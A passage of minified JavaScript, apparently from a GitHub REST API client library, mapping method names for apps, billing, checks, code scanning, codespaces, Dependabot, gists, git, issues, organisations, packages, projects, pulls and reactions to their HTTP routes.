/app-manifests/{code}/conversions"],createInstallationAccessToken:["POST /app/installations/{installation_id}/access_tokens"],deleteAuthorization:["DELETE /applications/{client_id}/grant"],deleteInstallation:["DELETE /app/installations/{installation_id}"],deleteToken:["DELETE /applications/{client_id}/token"],getAuthenticated:["GET /app"],getBySlug:["GET /apps/{app_slug}"],getInstallation:["GET /app/installations/{installation_id}"],getOrgInstallation:["GET /orgs/{org}/installation"],getRepoInstallation:["GET /repos/{owner}/{repo}/installation"],getSubscriptionPlanForAccount:["GET /marketplace_listing/accounts/{account_id}"],getSubscriptionPlanForAccountStubbed:["GET /marketplace_listing/stubbed/accounts/{account_id}"],getUserInstallation:["GET /users/{username}/installation"],getWebhookConfigForApp:["GET /app/hook/config"],getWebhookDelivery:["GET /app/hook/deliveries/{delivery_id}"],listAccountsForPlan:["GET /marketplace_listing/plans/{plan_id}/accounts"],listAccountsForPlanStubbed:["GET /marketplace_listing/stubbed/plans/{plan_id}/accounts"],listInstallationReposForAuthenticatedUser:["GET /user/installations/{installation_id}/repositories"],listInstallations:["GET /app/installations"],listInstallationsForAuthenticatedUser:["GET /user/installations"],listPlans:["GET /marketplace_listing/plans"],listPlansStubbed:["GET /marketplace_listing/stubbed/plans"],listReposAccessibleToInstallation:["GET /installation/repositories"],listSubscriptionsForAuthenticatedUser:["GET /user/marketplace_purchases"],listSubscriptionsForAuthenticatedUserStubbed:["GET /user/marketplace_purchases/stubbed"],listWebhookDeliveries:["GET /app/hook/deliveries"],redeliverWebhookDelivery:["POST /app/hook/deliveries/{delivery_id}/attempts"],removeRepoFromInstallation:["DELETE /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","removeRepoFromInstallationForAuthenticatedUser"]}],removeRepoFromInstallationForAuthenticatedUser:["DELETE /user/installations/{installation_id}/repositories/{repository_id}"],resetToken:["PATCH /applications/{client_id}/token"],revokeInstallationAccessToken:["DELETE /installation/token"],scopeToken:["POST /applications/{client_id}/token/scoped"],suspendInstallation:["PUT /app/installations/{installation_id}/suspended"],unsuspendInstallation:["DELETE /app/installations/{installation_id}/suspended"],updateWebhookConfigForApp:["PATCH /app/hook/config"]},billing:{getGithubActionsBillingOrg:["GET /orgs/{org}/settings/billing/actions"],getGithubActionsBillingUser:["GET /users/{username}/settings/billing/actions"],getGithubAdvancedSecurityBillingGhe:["GET /enterprises/{enterprise}/settings/billing/advanced-security"],getGithubAdvancedSecurityBillingOrg:["GET /orgs/{org}/settings/billing/advanced-security"],getGithubPackagesBillingOrg:["GET /orgs/{org}/settings/billing/packages"],getGithubPackagesBillingUser:["GET /users/{username}/settings/billing/packages"],getSharedStorageBillingOrg:["GET /orgs/{org}/settings/billing/shared-storage"],getSharedStorageBillingUser:["GET /users/{username}/settings/billing/shared-storage"]},checks:{create:["POST /repos/{owner}/{repo}/check-runs"],createSuite:["POST /repos/{owner}/{repo}/check-suites"],get:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}"],getSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}"],listAnnotations:["GET /repos/{owner}/{repo}/check-runs/{check_run_id}/annotations"],listForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-runs"],listForSuite:["GET /repos/{owner}/{repo}/check-suites/{check_suite_id}/check-runs"],listSuitesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/check-suites"],rerequestRun:["POST /repos/{owner}/{repo}/check-runs/{check_run_id}/rerequest"],rerequestSuite:["POST /repos/{owner}/{repo}/check-suites/{check_suite_id}/rerequest"],setSuitesPreferences:["PATCH /repos/{owner}/{repo}/check-suites/preferences"],update:["PATCH /repos/{owner}/{repo}/check-runs/{check_run_id}"]},codeScanning:{deleteAnalysis:["DELETE /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}{?confirm_delete}"],getAlert:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}",{},{renamedParameters:{alert_id:"alert_number"}}],getAnalysis:["GET /repos/{owner}/{repo}/code-scanning/analyses/{analysis_id}"],getCodeqlDatabase:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases/{language}"],getSarif:["GET /repos/{owner}/{repo}/code-scanning/sarifs/{sarif_id}"],listAlertInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/code-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/code-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/code-scanning/alerts"],listAlertsInstances:["GET /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}/instances",{},{renamed:["codeScanning","listAlertInstances"]}],listCodeqlDatabases:["GET /repos/{owner}/{repo}/code-scanning/codeql/databases"],listRecentAnalyses:["GET /repos/{owner}/{repo}/code-scanning/analyses"],updateAlert:["PATCH /repos/{owner}/{repo}/code-scanning/alerts/{alert_number}"],uploadSarif:["POST /repos/{owner}/{repo}/code-scanning/sarifs"]},codesOfConduct:{getAllCodesOfConduct:["GET /codes_of_conduct"],getConductCode:["GET /codes_of_conduct/{key}"]},codespaces:{addRepositoryForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],addSelectedRepoToOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],codespaceMachinesForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/machines"],createForAuthenticatedUser:["POST /user/codespaces"],createOrUpdateOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],createOrUpdateSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}"],createWithPrForAuthenticatedUser:["POST /repos/{owner}/{repo}/pulls/{pull_number}/codespaces"],createWithRepoForAuthenticatedUser:["POST /repos/{owner}/{repo}/codespaces"],deleteForAuthenticatedUser:["DELETE /user/codespaces/{codespace_name}"],deleteFromOrganization:["DELETE /orgs/{org}/members/{username}/codespaces/{codespace_name}"],deleteOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],deleteSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}"],exportForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/exports"],getExportDetailsForAuthenticatedUser:["GET /user/codespaces/{codespace_name}/exports/{export_id}"],getForAuthenticatedUser:["GET /user/codespaces/{codespace_name}"],getOrgPublicKey:["GET /organizations/{org}/codespaces/secrets/public-key"],getOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}"],getPublicKeyForAuthenticatedUser:["GET /user/codespaces/secrets/public-key"],getRepoPublicKey:["GET /repos/{owner}/{repo}/codespaces/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/codespaces/secrets/{secret_name}"],getSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}"],listDevcontainersInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/devcontainers"],listForAuthenticatedUser:["GET /user/codespaces"],listInOrganization:["GET /orgs/{org}/codespaces",{},{renamedParameters:{org_id:"org"}}],listInRepositoryForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces"],listOrgSecrets:["GET /organizations/{org}/codespaces/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/codespaces/secrets"],listRepositoriesForSecretForAuthenticatedUser:["GET /user/codespaces/secrets/{secret_name}/repositories"],listSecretsForAuthenticatedUser:["GET /user/codespaces/secrets"],listSelectedReposForOrgSecret:["GET /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],preFlightWithRepoForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/new"],removeRepositoryForSecretForAuthenticatedUser:["DELETE /user/codespaces/secrets/{secret_name}/repositories/{repository_id}"],removeSelectedRepoFromOrgSecret:["DELETE /organizations/{org}/codespaces/secrets/{secret_name}/repositories/{repository_id}"],repoMachinesForAuthenticatedUser:["GET /repos/{owner}/{repo}/codespaces/machines"],setRepositoriesForSecretForAuthenticatedUser:["PUT /user/codespaces/secrets/{secret_name}/repositories"],setSelectedReposForOrgSecret:["PUT /organizations/{org}/codespaces/secrets/{secret_name}/repositories"],startForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/start"],stopForAuthenticatedUser:["POST /user/codespaces/{codespace_name}/stop"],stopInOrganization:["POST /orgs/{org}/members/{username}/codespaces/{codespace_name}/stop"],updateForAuthenticatedUser:["PATCH /user/codespaces/{codespace_name}"]},dependabot:{addSelectedRepoToOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],getAlert:["GET /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"],getOrgPublicKey:["GET /orgs/{org}/dependabot/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}"],getRepoPublicKey:["GET /repos/{owner}/{repo}/dependabot/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/dependabot/secrets/{secret_name}"],listAlertsForRepo:["GET /repos/{owner}/{repo}/dependabot/alerts"],listOrgSecrets:["GET /orgs/{org}/dependabot/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/dependabot/secrets"],listSelectedReposForOrgSecret:["GET /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/dependabot/secrets/{secret_name}/repositories/{repository_id}"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/dependabot/secrets/{secret_name}/repositories"],updateAlert:["PATCH /repos/{owner}/{repo}/dependabot/alerts/{alert_number}"]},dependencyGraph:{createRepositorySnapshot:["POST /repos/{owner}/{repo}/dependency-graph/snapshots"],diffRange:["GET /repos/{owner}/{repo}/dependency-graph/compare/{basehead}"]},emojis:{get:["GET /emojis"]},enterpriseAdmin:{addCustomLabelsToSelfHostedRunnerForEnterprise:["POST /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],disableSelectedOrganizationGithubActionsEnterprise:["DELETE /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],enableSelectedOrganizationGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations/{org_id}"],getAllowedActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/selected-actions"],getGithubActionsPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions"],getServerStatistics:["GET /enterprise-installation/{enterprise_or_org}/server-statistics"],listLabelsForSelfHostedRunnerForEnterprise:["GET /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],listSelectedOrganizationsEnabledGithubActionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/organizations"],removeAllCustomLabelsFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForEnterprise:["DELETE /enterprises/{enterprise}/actions/runners/{runner_id}/labels/{name}"],setAllowedActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForEnterprise:["PUT /enterprises/{enterprise}/actions/runners/{runner_id}/labels"],setGithubActionsPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions"],setSelectedOrganizationsEnabledGithubActionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/organizations"]},gists:{checkIsStarred:["GET /gists/{gist_id}/star"],create:["POST /gists"],createComment:["POST /gists/{gist_id}/comments"],delete:["DELETE /gists/{gist_id}"],deleteComment:["DELETE /gists/{gist_id}/comments/{comment_id}"],fork:["POST /gists/{gist_id}/forks"],get:["GET /gists/{gist_id}"],getComment:["GET /gists/{gist_id}/comments/{comment_id}"],getRevision:["GET /gists/{gist_id}/{sha}"],list:["GET /gists"],listComments:["GET /gists/{gist_id}/comments"],listCommits:["GET /gists/{gist_id}/commits"],listForUser:["GET /users/{username}/gists"],listForks:["GET /gists/{gist_id}/forks"],listPublic:["GET /gists/public"],listStarred:["GET /gists/starred"],star:["PUT /gists/{gist_id}/star"],unstar:["DELETE /gists/{gist_id}/star"],update:["PATCH /gists/{gist_id}"],updateComment:["PATCH /gists/{gist_id}/comments/{comment_id}"]},git:{createBlob:["POST /repos/{owner}/{repo}/git/blobs"],createCommit:["POST /repos/{owner}/{repo}/git/commits"],createRef:["POST /repos/{owner}/{repo}/git/refs"],createTag:["POST /repos/{owner}/{repo}/git/tags"],createTree:["POST /repos/{owner}/{repo}/git/trees"],deleteRef:["DELETE /repos/{owner}/{repo}/git/refs/{ref}"],getBlob:["GET /repos/{owner}/{repo}/git/blobs/{file_sha}"],getCommit:["GET /repos/{owner}/{repo}/git/commits/{commit_sha}"],getRef:["GET /repos/{owner}/{repo}/git/ref/{ref}"],getTag:["GET /repos/{owner}/{repo}/git/tags/{tag_sha}"],getTree:["GET /repos/{owner}/{repo}/git/trees/{tree_sha}"],listMatchingRefs:["GET /repos/{owner}/{repo}/git/matching-refs/{ref}"],updateRef:["PATCH /repos/{owner}/{repo}/git/refs/{ref}"]},gitignore:{getAllTemplates:["GET /gitignore/templates"],getTemplate:["GET /gitignore/templates/{name}"]},interactions:{getRestrictionsForAuthenticatedUser:["GET /user/interaction-limits"],getRestrictionsForOrg:["GET /orgs/{org}/interaction-limits"],getRestrictionsForRepo:["GET /repos/{owner}/{repo}/interaction-limits"],getRestrictionsForYourPublicRepos:["GET /user/interaction-limits",{},{renamed:["interactions","getRestrictionsForAuthenticatedUser"]}],removeRestrictionsForAuthenticatedUser:["DELETE /user/interaction-limits"],removeRestrictionsForOrg:["DELETE /orgs/{org}/interaction-limits"],removeRestrictionsForRepo:["DELETE /repos/{owner}/{repo}/interaction-limits"],removeRestrictionsForYourPublicRepos:["DELETE /user/interaction-limits",{},{renamed:["interactions","removeRestrictionsForAuthenticatedUser"]}],setRestrictionsForAuthenticatedUser:["PUT /user/interaction-limits"],setRestrictionsForOrg:["PUT /orgs/{org}/interaction-limits"],setRestrictionsForRepo:["PUT /repos/{owner}/{repo}/interaction-limits"],setRestrictionsForYourPublicRepos:["PUT /user/interaction-limits",{},{renamed:["interactions","setRestrictionsForAuthenticatedUser"]}]},issues:{addAssignees:["POST /repos/{owner}/{repo}/issues/{issue_number}/assignees"],addLabels:["POST /repos/{owner}/{repo}/issues/{issue_number}/labels"],checkUserCanBeAssigned:["GET /repos/{owner}/{repo}/assignees/{assignee}"],create:["POST /repos/{owner}/{repo}/issues"],createComment:["POST /repos/{owner}/{repo}/issues/{issue_number}/comments"],createLabel:["POST /repos/{owner}/{repo}/labels"],createMilestone:["POST /repos/{owner}/{repo}/milestones"],deleteComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}"],deleteLabel:["DELETE /repos/{owner}/{repo}/labels/{name}"],deleteMilestone:["DELETE /repos/{owner}/{repo}/milestones/{milestone_number}"],get:["GET /repos/{owner}/{repo}/issues/{issue_number}"],getComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}"],getEvent:["GET /repos/{owner}/{repo}/issues/events/{event_id}"],getLabel:["GET /repos/{owner}/{repo}/labels/{name}"],getMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}"],list:["GET /issues"],listAssignees:["GET /repos/{owner}/{repo}/assignees"],listComments:["GET /repos/{owner}/{repo}/issues/{issue_number}/comments"],listCommentsForRepo:["GET /repos/{owner}/{repo}/issues/comments"],listEvents:["GET /repos/{owner}/{repo}/issues/{issue_number}/events"],listEventsForRepo:["GET /repos/{owner}/{repo}/issues/events"],listEventsForTimeline:["GET /repos/{owner}/{repo}/issues/{issue_number}/timeline"],listForAuthenticatedUser:["GET /user/issues"],listForOrg:["GET /orgs/{org}/issues"],listForRepo:["GET /repos/{owner}/{repo}/issues"],listLabelsForMilestone:["GET /repos/{owner}/{repo}/milestones/{milestone_number}/labels"],listLabelsForRepo:["GET /repos/{owner}/{repo}/labels"],listLabelsOnIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/labels"],listMilestones:["GET /repos/{owner}/{repo}/milestones"],lock:["PUT /repos/{owner}/{repo}/issues/{issue_number}/lock"],removeAllLabels:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels"],removeAssignees:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/assignees"],removeLabel:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/labels/{name}"],setLabels:["PUT /repos/{owner}/{repo}/issues/{issue_number}/labels"],unlock:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/lock"],update:["PATCH /repos/{owner}/{repo}/issues/{issue_number}"],updateComment:["PATCH /repos/{owner}/{repo}/issues/comments/{comment_id}"],updateLabel:["PATCH /repos/{owner}/{repo}/labels/{name}"],updateMilestone:["PATCH /repos/{owner}/{repo}/milestones/{milestone_number}"]},licenses:{get:["GET /licenses/{license}"],getAllCommonlyUsed:["GET /licenses"],getForRepo:["GET /repos/{owner}/{repo}/license"]},markdown:{render:["POST /markdown"],renderRaw:["POST /markdown/raw",{headers:{"content-type":"text/plain; charset=utf-8"}}]},meta:{get:["GET /meta"],getOctocat:["GET /octocat"],getZen:["GET /zen"],root:["GET /"]},migrations:{cancelImport:["DELETE /repos/{owner}/{repo}/import"],deleteArchiveForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/archive"],deleteArchiveForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/archive"],downloadArchiveForOrg:["GET /orgs/{org}/migrations/{migration_id}/archive"],getArchiveForAuthenticatedUser:["GET /user/migrations/{migration_id}/archive"],getCommitAuthors:["GET /repos/{owner}/{repo}/import/authors"],getImportStatus:["GET /repos/{owner}/{repo}/import"],getLargeFiles:["GET /repos/{owner}/{repo}/import/large_files"],getStatusForAuthenticatedUser:["GET /user/migrations/{migration_id}"],getStatusForOrg:["GET /orgs/{org}/migrations/{migration_id}"],listForAuthenticatedUser:["GET /user/migrations"],listForOrg:["GET /orgs/{org}/migrations"],listReposForAuthenticatedUser:["GET /user/migrations/{migration_id}/repositories"],listReposForOrg:["GET /orgs/{org}/migrations/{migration_id}/repositories"],listReposForUser:["GET /user/migrations/{migration_id}/repositories",{},{renamed:["migrations","listReposForAuthenticatedUser"]}],mapCommitAuthor:["PATCH /repos/{owner}/{repo}/import/authors/{author_id}"],setLfsPreference:["PATCH /repos/{owner}/{repo}/import/lfs"],startForAuthenticatedUser:["POST /user/migrations"],startForOrg:["POST /orgs/{org}/migrations"],startImport:["PUT /repos/{owner}/{repo}/import"],unlockRepoForAuthenticatedUser:["DELETE /user/migrations/{migration_id}/repos/{repo_name}/lock"],unlockRepoForOrg:["DELETE /orgs/{org}/migrations/{migration_id}/repos/{repo_name}/lock"],updateImport:["PATCH /repos/{owner}/{repo}/import"]},orgs:{addSecurityManagerTeam:["PUT /orgs/{org}/security-managers/teams/{team_slug}"],blockUser:["PUT /orgs/{org}/blocks/{username}"],cancelInvitation:["DELETE /orgs/{org}/invitations/{invitation_id}"],checkBlockedUser:["GET /orgs/{org}/blocks/{username}"],checkMembershipForUser:["GET /orgs/{org}/members/{username}"],checkPublicMembershipForUser:["GET /orgs/{org}/public_members/{username}"],convertMemberToOutsideCollaborator:["PUT /orgs/{org}/outside_collaborators/{username}"],createCustomRole:["POST /orgs/{org}/custom_roles"],createInvitation:["POST /orgs/{org}/invitations"],createWebhook:["POST /orgs/{org}/hooks"],deleteCustomRole:["DELETE /orgs/{org}/custom_roles/{role_id}"],deleteWebhook:["DELETE /orgs/{org}/hooks/{hook_id}"],enableOrDisableSecurityProductOnAllOrgRepos:["POST /orgs/{org}/{security_product}/{enablement}"],get:["GET /orgs/{org}"],getMembershipForAuthenticatedUser:["GET /user/memberships/orgs/{org}"],getMembershipForUser:["GET /orgs/{org}/memberships/{username}"],getWebhook:["GET /orgs/{org}/hooks/{hook_id}"],getWebhookConfigForOrg:["GET /orgs/{org}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}"],list:["GET /organizations"],listAppInstallations:["GET /orgs/{org}/installations"],listBlockedUsers:["GET /orgs/{org}/blocks"],listCustomRoles:["GET /organizations/{organization_id}/custom_roles"],listFailedInvitations:["GET /orgs/{org}/failed_invitations"],listFineGrainedPermissions:["GET /orgs/{org}/fine_grained_permissions"],listForAuthenticatedUser:["GET /user/orgs"],listForUser:["GET /users/{username}/orgs"],listInvitationTeams:["GET /orgs/{org}/invitations/{invitation_id}/teams"],listMembers:["GET /orgs/{org}/members"],listMembershipsForAuthenticatedUser:["GET /user/memberships/orgs"],listOutsideCollaborators:["GET /orgs/{org}/outside_collaborators"],listPendingInvitations:["GET /orgs/{org}/invitations"],listPublicMembers:["GET /orgs/{org}/public_members"],listSecurityManagerTeams:["GET /orgs/{org}/security-managers"],listWebhookDeliveries:["GET /orgs/{org}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /orgs/{org}/hooks"],pingWebhook:["POST /orgs/{org}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /orgs/{org}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeMember:["DELETE /orgs/{org}/members/{username}"],removeMembershipForUser:["DELETE /orgs/{org}/memberships/{username}"],removeOutsideCollaborator:["DELETE /orgs/{org}/outside_collaborators/{username}"],removePublicMembershipForAuthenticatedUser:["DELETE /orgs/{org}/public_members/{username}"],removeSecurityManagerTeam:["DELETE /orgs/{org}/security-managers/teams/{team_slug}"],setMembershipForUser:["PUT /orgs/{org}/memberships/{username}"],setPublicMembershipForAuthenticatedUser:["PUT /orgs/{org}/public_members/{username}"],unblockUser:["DELETE /orgs/{org}/blocks/{username}"],update:["PATCH /orgs/{org}"],updateCustomRole:["PATCH /orgs/{org}/custom_roles/{role_id}"],updateMembershipForAuthenticatedUser:["PATCH /user/memberships/orgs/{org}"],updateWebhook:["PATCH /orgs/{org}/hooks/{hook_id}"],updateWebhookConfigForOrg:["PATCH /orgs/{org}/hooks/{hook_id}/config"]},packages:{deletePackageForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}"],deletePackageForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}"],deletePackageForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}"],deletePackageVersionForAuthenticatedUser:["DELETE /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForOrg:["DELETE /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],deletePackageVersionForUser:["DELETE /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getAllPackageVersionsForAPackageOwnedByAnOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByOrg"]}],getAllPackageVersionsForAPackageOwnedByTheAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions",{},{renamed:["packages","getAllPackageVersionsForPackageOwnedByAuthenticatedUser"]}],getAllPackageVersionsForPackageOwnedByAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByOrg:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions"],getAllPackageVersionsForPackageOwnedByUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions"],getPackageForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}"],getPackageForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}"],getPackageForUser:["GET /users/{username}/packages/{package_type}/{package_name}"],getPackageVersionForAuthenticatedUser:["GET /user/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForOrganization:["GET /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}"],getPackageVersionForUser:["GET /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}"],listPackagesForAuthenticatedUser:["GET /user/packages"],listPackagesForOrganization:["GET /orgs/{org}/packages"],listPackagesForUser:["GET /users/{username}/packages"],restorePackageForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageForUser:["POST /users/{username}/packages/{package_type}/{package_name}/restore{?token}"],restorePackageVersionForAuthenticatedUser:["POST /user/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForOrg:["POST /orgs/{org}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"],restorePackageVersionForUser:["POST /users/{username}/packages/{package_type}/{package_name}/versions/{package_version_id}/restore"]},projects:{addCollaborator:["PUT /projects/{project_id}/collaborators/{username}"],createCard:["POST /projects/columns/{column_id}/cards"],createColumn:["POST /projects/{project_id}/columns"],createForAuthenticatedUser:["POST /user/projects"],createForOrg:["POST /orgs/{org}/projects"],createForRepo:["POST /repos/{owner}/{repo}/projects"],delete:["DELETE /projects/{project_id}"],deleteCard:["DELETE /projects/columns/cards/{card_id}"],deleteColumn:["DELETE /projects/columns/{column_id}"],get:["GET /projects/{project_id}"],getCard:["GET /projects/columns/cards/{card_id}"],getColumn:["GET /projects/columns/{column_id}"],getPermissionForUser:["GET /projects/{project_id}/collaborators/{username}/permission"],listCards:["GET /projects/columns/{column_id}/cards"],listCollaborators:["GET /projects/{project_id}/collaborators"],listColumns:["GET /projects/{project_id}/columns"],listForOrg:["GET /orgs/{org}/projects"],listForRepo:["GET /repos/{owner}/{repo}/projects"],listForUser:["GET /users/{username}/projects"],moveCard:["POST /projects/columns/cards/{card_id}/moves"],moveColumn:["POST /projects/columns/{column_id}/moves"],removeCollaborator:["DELETE /projects/{project_id}/collaborators/{username}"],update:["PATCH /projects/{project_id}"],updateCard:["PATCH /projects/columns/cards/{card_id}"],updateColumn:["PATCH /projects/columns/{column_id}"]},pulls:{checkIfMerged:["GET /repos/{owner}/{repo}/pulls/{pull_number}/merge"],create:["POST /repos/{owner}/{repo}/pulls"],createReplyForReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments/{comment_id}/replies"],createReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],createReviewComment:["POST /repos/{owner}/{repo}/pulls/{pull_number}/comments"],deletePendingReview:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],deleteReviewComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}"],dismissReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/dismissals"],get:["GET /repos/{owner}/{repo}/pulls/{pull_number}"],getReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],getReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}"],list:["GET /repos/{owner}/{repo}/pulls"],listCommentsForReview:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/comments"],listCommits:["GET /repos/{owner}/{repo}/pulls/{pull_number}/commits"],listFiles:["GET /repos/{owner}/{repo}/pulls/{pull_number}/files"],listRequestedReviewers:["GET /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],listReviewComments:["GET /repos/{owner}/{repo}/pulls/{pull_number}/comments"],listReviewCommentsForRepo:["GET /repos/{owner}/{repo}/pulls/comments"],listReviews:["GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews"],merge:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/merge"],removeRequestedReviewers:["DELETE /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],requestReviewers:["POST /repos/{owner}/{repo}/pulls/{pull_number}/requested_reviewers"],submitReview:["POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/events"],update:["PATCH /repos/{owner}/{repo}/pulls/{pull_number}"],updateBranch:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/update-branch"],updateReview:["PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}"],updateReviewComment:["PATCH /repos/{owner}/{repo}/pulls/comments/{comment_id}"]},rateLimit:{get:["GET /rate_limit"]},reactions:{createForCommitComment:["POST /repos/{owner}/{repo}/comments/{comment_id}/reactions"],createForIssue:["POST /repos/{owner}/{repo}/issues/{issue_number}/reactions"],createForIssueComment:["POST /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],createForPullRequestReviewComment:["POST /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],createForRelease:["POST /repos/{owner}/{repo}/releases/{release_id}/reactions"],createForTeamDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],createForTeamDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"],deleteForCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}/reactions/{reaction_id}"],deleteForIssue:["DELETE /repos/{owner}/{repo}/issues/{issue_number}/reactions/{reaction_id}"],deleteForIssueComment:["DELETE /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions/{reaction_id}"],deleteForPullRequestComment:["DELETE /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions/{reaction_id}"],deleteForRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}/reactions/{reaction_id}"],deleteForTeamDiscussion:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions/{reaction_id}"],deleteForTeamDiscussionComment:["DELETE 